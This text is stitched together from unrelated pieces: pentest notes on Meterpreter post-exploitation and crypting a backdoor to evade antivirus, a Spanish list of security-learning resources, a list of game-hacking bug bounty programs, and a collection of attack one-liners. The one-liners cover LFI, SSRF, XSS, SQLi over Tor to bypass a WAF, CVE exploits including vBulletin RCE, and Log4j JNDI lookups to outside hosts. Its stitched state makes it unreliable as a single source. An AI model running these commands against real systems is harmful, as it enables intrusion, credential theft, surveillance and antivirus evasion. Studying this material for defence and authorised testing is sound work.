Not have enough buffer space
Or need to bypass antivirus
- Experimenting with Meterpreter
- Get system information from Meterpreter Shell
sysinfo
- Get user id from Meterpreter Shell
getuid
- Search for a file
search -f \*pass\*.txt
- Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\\\Users\\\\Offsec
- Download a file
download c:\\\\Windows\\\\system32\\\\calc.exe /tmp/calc.exe
- Invoke a command shell from Meterpreter Shell
shell
- Exit the meterpreter shell
exit
- Metasploit Exploit Multi Handler
- multi/handler to accept an incoming reverse\_https\_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse\_https
set LHOST $ip
set LPORT 443
exploit
\[\*\] Started HTTPS reverse handler on https://$ip:443/
- Building Your Own MSF Module
- mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb
- Post Exploitation with Metasploit
- download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan\_start Start capturing keystrokes
keyscan\_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record\_mic Record audio from the default microphone for X
seconds
webcam\_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local
system.
hashdump Dumps the contents of the SAM database
- Meterpreter Post Exploitation Features
- Create a Meterpreter background session
background
<span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software
===========================================================================================================================
- Crypting Known Malware with Software Protectors
- One such open source crypter, called Hyperion
cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/\*.cpp -o hyperion.exe
cp -p
/usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc\_s\_sjlj-1.dll
.
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll
.
wine hyperion.exe ../backdoor.exe ../crypted.exe
|
# Recursos para aprender sobre seguridad informática
Compilados por DCcurity (grupo de estudiantes del Departamento de Computación, Facultad de Ciencias Exactas y Naturales, Universidad de Buenos Aires).
## Caminos
### Reversing/Pwn
- [Guía de escritra de exploits Fundación Sadosky](https://fundacion-sadosky.github.io/guia-escritura-exploits/): Para iniciarse en explotación del stack.
- [Ejercicios extra Fundación Sadosky](https://github.com/fundacion-sadosky/abopp): Acá están los ejercicios de la guía y más.
- [Microcorruption: Embedded Security CTF](https://microcorruption.com/): Desafíos de reversing en sistemas embebidos.
- [CS6265: Information Security Lab](https://tc.gts3.org/cs6265/2019/tut/index.html): Tutorial de reversing Georgia Tech Systems Software & Security Lab.
- [ret2rop](https://www.ret2rop.com/): Format strings y bypassing de protecciones.
- [pwn.college](https://pwn.college/): Curso abierto de la Universidad Estatal de Arizona.
- [Nora's intro to x86_64 reversing](https://nora.codes/tutorial/an-intro-to-x86_64-reverse-engineering/): Introducción a reversing de 64 bits en Linux utilizando radare2 y varias utilidades de Linux.
- [Nightmare](https://guyinatuxedo.github.io/index.html): Introducción a reversing/binary exploitation desde 0 basado en challenges estilo CTF.
### Web
- [WebGoat](https://github.com/WebGoat/WebGoat): Aplicación web insegura que permite a desarrolladores y otres interesades probar las vulnerabilidades que se encuentran comúnmente en aplicaciones basadas en Java que utilizan componentes de código abierto comunes y populares.
- [JuiceShop](https://github.com/bkimminich/juice-shop): Aplicación web insegura que incluye vulnerabilidades de todo el Top Ten de OWASP junto con muchas otras fallas de seguridad que se encuentran en aplicaciones del mundo real.
- [PortSwigger: Web Security Academy](https://portswigger.net/web-security): Curso gratuito sobre seguridad web hecho por los creadores de Burp Suite.
- [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings): Lista estilo cheatsheet de herramientas y exploits para penetrar aplicaciones web.
### Redes
- [Introduction to Computer Networking](https://www.youtube.com/playlist?list=PLEAYkSg4uSQ2dr0XO_Nwa5OcdEcaaELSG): Curso de introductorio de Networking dictado por Philip Levis and Nick McKeown de la Universidad de Stanford. Incluye entrevistas a personas que trabajan en la industria como profesionales.
### Criptografía
- [CryptoHack](https://cryptohack.org): Plataforma para aprender criptografía moderna mediante ejercicios de programación y otros desafíos.
- [The Cryptopals Crypto Challenges](https://cryptopals.com/): Ejercicios de programación que construyen conocimiento de criptografía desde lo esencial hasta algoritmos standard actuales.
- [Boxentriq: Code breaking](https://www.boxentriq.com/code-breaking): Cifrados clásicos.
### Malware
- [Introducción al Análisis del Malware en Windows](https://miriadax.net/web/introduccion-al-analisis-del-malware-en-windows-3-edicion-): Introducción al análisis de malware en Windows en español (3.ª edición).
- [Malware Reverse Engineering 101](https://malwareunicorn.org/workshops/re101.html#0): Curso práctico con herramientas sobre los fundamentos de reverse engineering (RE) de malware de Windows.
- [CS6038/CS5138 Malware Analysis](https://class.malware.re/): Curso orientado a estudiantes de Cs de la Computación sobre conceptos de malware, análisis de malware y técnicas de reverse engineering en Black Box.
- [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis): Una lista de recursos y herramientas de análisis de malware.
### Integral
- [6.858: Computer Systems Security](https://css.csail.mit.edu/6.858/2020/): Materia de seguridad informática del MIT edición 2020.
- [TryHackMe](https://tryhackme.com/): Tutoriales y máquinas remotas para practicar penetration testing.
- [Over the Wire](https://overthewire.org/wargames/): Gamificación por medio de Wargames para aprender conceptos de seguridad.
- [Hack This Site](https://hackthissite.org): Gamificación con niveles variables de dificultad. Se empieza con desafíos muy simples para entender cómo está hecha una página web y progresan hacia seguridad de aplicaciones y análisis forense, entre otras cosas.
- [Hack the Box](https://hackthebox.eu): Máquinas remotas para practicar penetration testing y desafíos de varias categorias.
- [Vulnhub](https://www.vulnhub.com/): Máquinas virtuales para descargar y practicar penetration testing.
- [IO](http://io.netgarage.org/): Wargame con niveles variables de dificultad. Cada uno de los desafíos tiene un bit SUID establecido.
- [Defend the web](https://defendtheweb.net/): Gamificación con más de 60 niveles variables de dificultad.
- [lpeworkshop](https://github.com/sagishahar/lpeworkshop): Workshop de escalado de privilegios en Linux y Windows.
- [HatTricks Book](https://book.hacktricks.xyz/): Lista de metodologías, vulnerabilidades comunes y checklists para pentesting, reversing y privilege escalation.
## Canales de YouTube
### Técnicos + Tutoriales
- [Missing Semester](https://www.youtube.com/channel/UCuXy5tCgEninup9cGplbiFw)
- [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [stacksmasing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
- [IppSec (Hack the Box walkthroughs)](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
- [MalwareTech](https://www.youtube.com/c/MalwareTechBlog)
### Charlas
- [Ekoparty Security Conference](https://www.youtube.com/channel/UCiVNwNkoMapaeyr9o6XEonA)
- [DEF CON](https://www.youtube.com/user/DEFCONConference)
- [Black Hat](https://www.youtube.com/user/BlackHatOfficialYT)
- [OffensiveCon](https://www.youtube.com/channel/UCMNvAtT4ak2azKNk6UlB1QQ)
- [Virus Bulletin](https://www.youtube.com/user/virusbtn)
## Blogs
- [MalwareTech - Life of a Malware Analyst](https://www.malwaretech.com/)
- [Azeria Labs](https://azeria-labs.com/writing-arm-assembly-part-1/): Tutoriales de ARM assembly y explotación en ARM.
## Otras listas de recursos
- [The arsenal, armory & library by Maderas](https://pastebin.com/v8Mr2k95)
- [Information Security related Mind Maps](https://www.amanhardikar.com/mindmaps.html#)
- [KitPloit Newsletter](https://www.kitploit.com/)
- [Links compilados por Elías K.](https://pastebin.com/WQhRYB59)
|
[![Check out my new game hacking series over on the intigriti YT channel 💜](https://img.youtube.com/vi/ku6AtIY-Lu0/0.jpg)](https://www.youtube.com/watch?v=ku6AtIY-Lu0&list=PLmqenIp2RQcg0x2mDAyL2MC23DAGcCR9b "Game Hacking: Cheat Engine")
## Bug Bounty Programs
### Intigriti
- [InnoGames](https://app.intigriti.com/programs/innogames/innogames)
- [NapoleonGames](https://app.intigriti.com/programs/hucklu/napoleongames)
- [WimiGames](https://app.intigriti.com/programs/wimigames/wimigames)
- [Embark Studios](https://app.intigriti.com/programs/embarkstudios/embarkstudios)
- [Ubisoft](https://app.intigriti.com/programs/ubisoft/ubisoftvdp)
- [Ninja Kiwi Games](https://app.intigriti.com/programs/ninjakiwigames/ninjakiwigames)
### BugCrowd
- [Rec Room Video Games](https://bugcrowd.com/recroom-og) - `be warned, closes reports for Frida`
### HackerOne
- [Riot Games](https://hackerone.com/riot)
- [Rockstar Games](https://hackerone.com/rockstargames)
- [Epic Games](https://hackerone.com/epicgames)
- [Valve](https://hackerone.com/valve)
- [Nintendo](https://hackerone.com/nintendo) - `doesn't want game bugs (just console)`
- [Playstation](https://hackerone.com/playstation) - `doesn't want game bugs (just console)`
- [SEGA](https://hackerone.com/sega)
- [Roblox](https://hackerone.com/roblox)
- [PUBG](https://hackerone.com/pubg) - `send bug and they will add to private`
- [Scopely](https://hackerone.com/scopely)
- [Kaneva](https://hackerone.com/kaneva)
- [Flutter UK&I](https://hackerone.com/flutteruki)
- [EXTERNAL: Gameloft](https://hackerone.com/gameloft) - `hard to reach`
- [EXTERNAL: GameForge](https://hackerone.com/gameforge)
- [EXTERNAL: Aeria Games](https://hackerone.com/aeria-games-entertainment) - `doesn't want bugs right now`
- [EXTERNAL: StopGame](https://hackerone.com/stopgame_ru)
- [EXTERNAL: Smite - The Game](https://hackerone.com/smite_the_game) - `doesn't want bugs right now`
- [EXTERNAL: Game321](https://hackerone.com/game321)
- [EXTERNAL: CodinGame](https://hackerone.com/codingame)
- [EXTERNAL: Z8Games](https://hackerone.com/z8games)
- [EXTERNAL: Chess.com](https://hackerone.com/chess_com) - `doesn't want bugs right now`
- [EXTERNAL: CCP Games](https://hackerone.com/ccp) - `lack of communication`
- [EXTERNAL: Wargaming.net](https://hackerone.com/wargaming_net)
### Internal
- [Sky Mavis](https://skymavis.notion.site/Sky-Mavis-Bug-Bounty-Program-ef33b18c4ee14eaab4698a8efd2c9992)
- [XBox](https://www.microsoft.com/en-us/msrc/bounty-xbox)
- [Wolf Game](https://github.com/WolfGameDev/bug-bounty)
- [GameForge](https://security.gameforge.com/en)
- [Zynga](https://www.zynga.com/security/rdp)
- [Sea](https://www.sea.com/security)
- [ARK](https://survivetheark.com/index.php?/forums/topic/294125-exploit-bug-bounty-updated-31st-of-may-2022-total-paid-out-65780)
- [Hytale](https://hytale.com/security)
### VDP
- [Red Games](https://www.redgames.co/security)
- [Fun Plus](https://funplus.com/report-security-vulnerabilities)
- [IOI](https://www.ioi.dk/security)
## Researchers
- [Intigriti: hg_real](https://app.intigriti.com/profile/hg_real)
- [Intigriti: xor](https://app.intigriti.com/researcher/profile/xor)
- [Intigriti: ferib](https://app.intigriti.com/profile/ferib)
- [Intigriti: tomorrowisnew](https://app.intigriti.com/profile/tomorrowisnew)
- [Intigriti: hacktus](https://app.intigriti.com/profile/hacktus)
- [Intigriti: mattibijnens](https://app.intigriti.com/profile/mattibijnens)
- [Intigriti: batee5a](https://app.intigriti.com/profile/batee5a)
- [Twitter List](https://twitter.com/i/lists/1612447308234252293) - `hard to determine relevance, many are general reversing/malware focused`
## Bug Reports
### 2023
- [Unity: Impersonating Other Players with UDP Spoofing in Mirror](https://blog.includesecurity.com/2023/04/impersonating-local-unity-players-with-udp-spoofing-in-mirror)
- [CS:GO: From Zero to 0-day](https://neodyme.io/blog/csgo_from_zero_to_0day)
- [Chess.com: Checkmate](https://research.checkpoint.com/2023/checkmate)
- [Dota 2: How a V8 Bug Was Exploited in the Game](https://decoded.avast.io/janvojtesek/dota-2-under-attack-how-a-v8-bug-was-exploited-in-the-game)
- [Instant Games: DOM-XSS due to improper verification of supplied URLs](https://ysamm.com/?p=779)
- [Facebook: Disclosing page admins by playing a game](https://medium.com/@sudipshah_66336/disclosing-facebook-page-admins-by-playing-a-game-2b0f4ed082e4)
### 2022
- [XSS on account.leagueoflegends.com via XDM](https://medium.com/bored-engineer/xss-on-account-leagueoflegends-com-via-easyxdm-2016-75bcf9d582b5) - `reported 2016`
- [Ubisoft: Fuzzing game server and blind format string](https://blog.bricked.tech/posts/tmnf/part1)
- [Epic: Rediscovering Epic Games 0-Days (LPE)](https://www.signal-labs.com/blog/rediscovering-epic-games-0-days)
- [Nintendo Mario Kart: Improper verification of Competition creation allows to create "Official" competitions](https://hackerone.com/reports/1653676)
### 2021
- [Unity: Hacking Unity Games with Malicious GameObjects](https://blog.includesecurity.com/2021/06/hacking-unity-games-malicious-unity-game-objects)
- [Valve: Source engine remote code execution via game invites](https://secret.club/2021/04/20/source-engine-rce-invite.html)
- [Facebook: Applying Offensive Reverse Engineering to Facebook Gameroom](https://spaceraccoon.dev/applying-offensive-reverse-engineering-to-facebook-gameroom)
- [InnoGames: Destroying Armies and Villages through Cross-Site Scripting](https://0xfabiof.github.io/stored-xss-tw)
### 2020
- [Valve: Finding vulnerabilities in Valve's Steam Sockets](https://research.checkpoint.com/2020/game-on-finding-vulnerabilities-in-valves-steam-sockets) - `links some good game hacking videos (DefCon)`
### 2017
- [Rockstar: Stored XSS on Rockstar Game](https://arbazhussain.medium.com/stored-xss-on-rockstar-game-c008ec18d071)
### 2016
- [Valve: How I got a game on the Steam Store without anyone from Valve ever looking at it](https://medium.com/swlh/watch-paint-dry-how-i-got-a-game-on-the-steam-store-without-anyone-from-valve-ever-looking-at-it-2e476858c753)
## Tutorials/Guides
- [Guided Hacking](https://guidedhacking.com)
- [Game Hacking Academy](https://gamehacking.academy)
- [Introduction to Game Hacking](https://medium.com/ax1al/introduction-to-game-hacking-fb70e29de60f)
- [CS420 Game Hacking Course](https://www.youtube.com/playlist?list=PLt9cUwGw6CYG1b4L76vZ49tvI2mfmRSCl)
- [OffensiveSecurity: Intro to Game Hacking](https://www.offensive-security.com/offsec/game-hacking-intro)
- [Game Hacking Bible](https://guidedhacking.com/threads/ghb0-game-hacking-bible-introduction.14450)
- [247CTF: Game Hacking 101](https://www.youtube.com/watch?v=w7gBkVXuDSQ&list=PLpnX4b2uRf5-_aLRjuIpav2Zh45C4f2QH)
- [LiveOverflow: Minecraft Hacking](https://www.youtube.com/watch?v=Ekcseve-mOg&list=PLhixgUqwRTjwvBI-hmbZ2rpkAl4lutnJG)
- [LiveOverflow: Pwnie Island](https://www.youtube.com/watch?v=RDZnlcnmPUA&list=PLhixgUqwRTjzzBeFSHXrw9DnQtssdAwgG)
- [LiveOverflow: Developing a Hackable Game](https://www.youtube.com/watch?v=LTlBElDPDDM&list=PLhixgUqwRTjwrqAY_YDWllMw4e5E89E3x)
- [HackTheBox: Intro to GamePwn](https://www.hackthebox.com/blog/intro-to-gamepwn-aka-game-hacking)
- [GuidedHacking: Hack Electron games with Chrome DevTools](https://www.youtube.com/watch?v=6u0V1svtj3A)
- [OWASP: Hacking Mobile Games with Alex Rosenzweig](https://www.youtube.com/watch?v=Fr86OIFiLAk)
- [CheatTheGame: LUA Learning](https://www.youtube.com/watch?v=zFtAlN1joIA&list=PLszEh0IDMrCl5yyOeyflivxabxx7w9MFt)
- [GuardSquare: Practical Security for Mobile Game Developers (3-part blog series)](https://www.guardsquare.com/blog/new-blog-series-practical-security-mobile-game-developers)
- [Stephen Chapman: Hacking Online Games](https://github.com/dsasmblr/hacking-online-games)
- [Rohan Aggarwal: Bypassing Anti-Cheats And Hacking Competitive Games](https://youtu.be/vwnjqmAruEw)
- [Videos](https://github.com/dsasmblr/game-hacking#videos)
## Video Creators
- [Guided Hacking](https://www.youtube.com/@GuidedHacking)
- [Stephen Chapman](https://www.youtube.com/user/seowhistleblower)
- [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [247CTF](https://www.youtube.com/@247CTF)
- [CyborgElf](https://www.youtube.com/@CyborgElf)
- [DexTag](https://www.youtube.com/@DexTag)
- [Cheat The Game](https://youtube.com/@ChrisFayte)
- [cazz](https://www.youtube.com/@cazz)
- [iwanMods](https://www.youtube.com/@iwanMods)
- [Apxaey](https://www.youtube.com/@apxaey1459)
- [Baseult](https://www.youtube.com/@baseultprivate9137)
- [Null](https://www.youtube.com/channel/UCZF93Qrt6yMAabRnlND4YsQ)
- [aXXo](https://www.youtube.com/@axxo1337)
## Research
- [TomorrowIsNew Blog](https://tomorrowisnew.com)
- [Parsiya](https://parsiya.net)
- [Blog Posts, Articles, Presentations](https://github.com/dsasmblr/game-hacking#blog-posts-articles-and-presentations)
- [Comparative Study of Anti-cheat Methods in Video Games](https://helda.helsinki.fi/bitstream/handle/10138/313587/Anti_cheat_for_video_games_final_07_03_2020.pdf)
## Vulnerable Games
- [Pwnie Island](https://www.pwnadventure.com)
- [Squally](https://squallygame.com)
- [HackTheBox GamePwn](https://app.hackthebox.com/challenges)
- [Open Source and Safe-to-Hack Games](https://github.com/dsasmblr/game-hacking#open-source-and-safe-to-hack-games)
### CTF Game Hacking Challenge Files
- [Byte Bandits 2023: The Unforgiving Jungle](https://github.com/ByteBandits/bbctf-2023/tree/main/misc/the-unforgiving-jungle)
- [Sekai 2022: Perfect Match X-treme](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/reverse/perfect-match-xtreme)
- [Google 2021: Hackceler8](https://github.com/google/google-ctf/tree/master/2020/hackceler8)
- [RACTF 2021: RSFPWS](https://github.com/ractf/challenges/tree/master/2021/RSFPWS)
- [Faust 2021: thelostbottle](https://github.com/fausecteam/faustctf-2021-thelostbottle)
- [Faust 2021: Loney Island](https://github.com/fausecteam/faustctf-2021-lonely-island)
- [NITE 2021: Lost Dungeon](https://github.com/project-kaat/ctf-writeups/tree/main/niteCTF2021/Lost%20Dungeon)
- [corCTF 2021: AliceInCeptionland](https://github.com/Crusaders-of-Rust/corCTF-2021-public-challenge-archive/tree/main/rev/AliceInCeptionland)
- [CSCG 2020: Follow the White Rabbit (2 parts)](https://cscg20-quals-archive.ente.ninja/tasks/follow-the-white-rabbit---cave.html)
- [CSCG 2020: Maze (6 parts)](https://cscg20-quals-archive.ente.ninja/tasks/maze---emoji.html)
- [ALLES! 2020: Craft](https://github.com/allesctf/2020/tree/master/challenges/allescraft)
- [ALLES! 2020: Flag Service Revolution](https://github.com/allesctf/2020/tree/master/challenges/flag_service_revolution)
- [ALLES! 2020: Pre-historic Mario](https://github.com/allesctf/2020/tree/master/challenges/prehistoric-mario)
- [angstrom 2020: Woooosh](https://files.actf.co/188f275d11eb621ad7308044f1af1bcbddc353335773e9201b4af88d9306b745/index.js)
- [nullcon HackIM 2020: Zelda Adventures](https://github.com/nullcon/hackim-2020/tree/master/zelda/ZeldaAdventures)
- [nullcon HackIM 2020: Zelda in Space](https://github.com/nullcon/hackim-2020/tree/master/zelda/ZeldaInSpace)
- [Midnight Sun 2020: StarCraft - Brood War](https://zeta-two.com/assets/other/starcraft-challenge.tgz)
## CTF Writeups
- [CTF Game Hacking Repo](https://github.com/mrT4ntr4/CTF-Game-Challenges)
- [CTFTime](https://ctftime.org/writeups?tags=game&hidden-tags=game)
- [idek2022: Bloodbath](https://github.com/flocto/writeups/tree/main/2023/idekCTF22/bloodbath)
## Tools
- [Game Hacking Tools](https://github.com/dsasmblr/game-hacking#game-hacking-tools-disassemblers-debuggers-hex-editors-unpackers-and-more) |
# One-Liners [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)
###### Thanks to all who create these Awesome One Liners❤️
----------------------
![image](https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png)
---------------------------
# Subdomain Enumeration
**Juicy Subdomains**
```
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'
```
**from BufferOver.run**
```
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
```
**from Riddler.io**
```
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
**from nmap**
```
nmap --script hostmap-crtsh.nse target.com
```
**from CertSpotter**
```
curl -s "https://certspotter.com/api/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
**from Archive**
```
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
```
**from JLDC**
```
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
**from crt.sh**
```
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```
**from ThreatMiner**
```
curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u
```
**from Anubis**
```
curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com"
```
**from ThreatCrowd**
```
curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com"
```
**from HackerTarget**
```
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com"
```
**from AlienVault**
```
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u
```
***SubDomain Bruteforcing - ffuf***
```
ffuf -u https://FUZZ.target.com -w dns.txt -v | grep "| URL |" | awk '{print $4}'
```
--------
## Subdomain Takeover:
```
cat subs.txt | xargs -P 50 -I % bash -c "dig % | grep CNAME" | awk '{print $1}' | sed 's/.$//g' | httpx -silent -status-code -cdn -csp-probe -tls-probe
```
-------------------------------
## LFI:
```
cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"
```
```
waybackurls target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```
```
cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done
```
----------------------
## Open Redirect:
```
waybackurls target.com | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done
```
```
cat subs.txt| waybackurls | gf redirect | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'
```
-----------------------
## SSRF:
```
cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'
```
```
cat wayback.txt | grep "=" | qsreplace "burpcollaborator_link" >> ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ
```
----------------
## XSS:
```
cat domains.txt | waybackurls | grep -Ev "\.(jpeg|jpg|png|ico)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"
```
```
gau target.com grep '='| qsreplace hack\" -a | while read url;do target-$(curl -s -l $url | egrep -o '(hack" | hack\\")'); echo -e "Target : \e[1;33m $url\e[om" "$target" "\n -"; done I sed 's/hack"/[xss Possible] Reflection Found/g'
```
```
cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/?name={{this.constructor.constructor('alert(\"foo\")')()}}" -mr "name={{this.constructor.constructor('alert("
```
```
cat targets.txt | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
```
```
waybackurls target.com | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
```
```
cat urls.txt | grep "=" | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht
```
```
cat targets.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)"
```
```
cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'
```
---------------------
## Hidden Dirs:
```
dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt
```
```
ffuf -c -w urls.txt:FUZZ1 -w wordlist.txt:FUZZ2 -u FUZZ1/FUZZ2 -mc 200 -ac -recursion -v -of json -o output
```
## ffuf json to txt output
```
cat output.json | jq | grep -o '"url": ".*"' | grep -o 'https://[^"]*'
```
**Search for Sensitive files from Wayback**
```
waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"
```
```
cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml" -mc 200
```
-------------------
## SQLi:
```
cat subs.txt | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 5 --risk 3
```
***Bypass WAF using TOR***
```
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor
```
----------------
## CORS:
```
gau "http://target.com" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
```
---------------
## Prototype Pollution:
```
subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
```
-------------
## CVEs:
### CVE-2020-5902:
```
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
```
### CVE-2020-3452:
```
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt
```
### CVE-2021-44228:
```
cat subdomains.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://log4j.requestcatcher.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://log4j.requestcatcher.com/a}";done
```
```
cat urls.txt | sed `s/https:///` | xargs -I {} echo `{}/${jndi:ldap://{}attacker.burpcollab.net}` >> lo4j.txt
```
### CVE-2022-0378:
```
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
```
### CVE-2022-22954:
```
cat urls.txt | while read h do ; do curl -sk --path-as-is “$h/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}”| grep "context" && echo "$h\033[0;31mV\n"|| echo "$h \033[0;32mN\n";done
```
### CVE-2022-41040:
```
ffuf -w "urls.txt:URL" -u "https://URL/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL" -mr "IIS Web Core" -r
```
---------
## RCE:
```
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
```
### vBulletin 5.6.2
```
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
```
```
subfinder -d target.com | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt; ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
```
-----------
## JS Files:
### Find JS Files:
```
gau -subs target.com |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt
```
```
